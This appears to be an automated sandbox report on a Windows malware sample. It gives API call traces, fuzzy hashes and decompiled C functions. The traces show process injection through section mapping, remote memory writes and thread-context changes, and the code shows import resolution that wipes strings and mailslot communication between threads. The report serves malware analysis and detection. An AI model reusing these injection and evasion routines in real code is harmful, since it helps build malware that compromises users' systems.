  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
    • Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04
  • memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4
    • Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
  • CloseHandle.KERNEL32(00000000), ref: 002E1EE0
  • memset.NTDLL ref: 002E1EF4
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
    • Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
